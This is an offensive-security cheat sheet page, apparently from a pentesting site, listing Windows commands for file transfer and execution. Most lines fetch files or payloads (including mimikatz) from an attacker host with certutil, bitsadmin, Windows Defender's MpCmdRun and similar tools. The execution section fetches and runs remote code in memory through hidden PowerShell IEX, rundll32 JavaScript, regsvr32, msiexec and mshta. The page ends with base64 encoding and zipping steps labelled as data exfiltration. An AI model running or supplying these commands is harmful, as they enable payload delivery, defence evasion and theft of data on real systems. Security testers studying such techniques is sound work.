pwny.cc
Search…
Exfiltration

Download files from CMD/powershell

1
#Curl
2
curl http://10.10.10.19:8000/file.exe --output file.exe
3
4
#CertUtil
5
certutil.exe -urlcache -f http://10.10.10.19/file.exe file.exe
6
7
#Wget
8
Invoke-WebRequest -Uri "http://10.10.10.19" -OutFile "C:\path\file"
9
10
#Powershell
11
powershell -c (New-Object Net.WebClient).DownloadFile('http://10.10.10.19/file', 'output-file')
12
13
#Bitsadmin
14
bitsadmin /transfer n http://10.10.10.19/imag/evil.txt d:\test\1.txt
15
16
#Wmic
17
wmic os get /FORMAT:"http://10.10.10.19/evil.xsl"
18
19
#Windows Defender
20
"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -DownloadFile -url http://10.10.10.19/mimikatz.zip -path .\\mimikatz.zip
Copied!

Execute code without download files locally

1
#Powershell
2
powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.10.19/evil.txt'))"
3
4
#Rundll
5
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://10.10.10.19:8888/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
6
7
#Regsrv32
8
regsvr32.exe /u /n /s /i:http://10.10.10.19:8888/file.sct scrobj.dll
9
10
#Msiexec
11
msiexec /q /i http://10.10.10.19/evil.msi
12
13
#Mshta
14
mshta http://10.10.10.19/run.hta
Copied!

Data Exfiltration

1
#CertUtil
2
certutil -encode file outputfile.b64 //ENCODE file in base64
3
certutil -decode file.b64 outputfile //DECODE file in base64
Copied!

Zip/Unzip files

1
#Powershell
2
Compress-Archive in.txt out.zip //zip
3
Expand-Archive out.zip //unzip
Copied!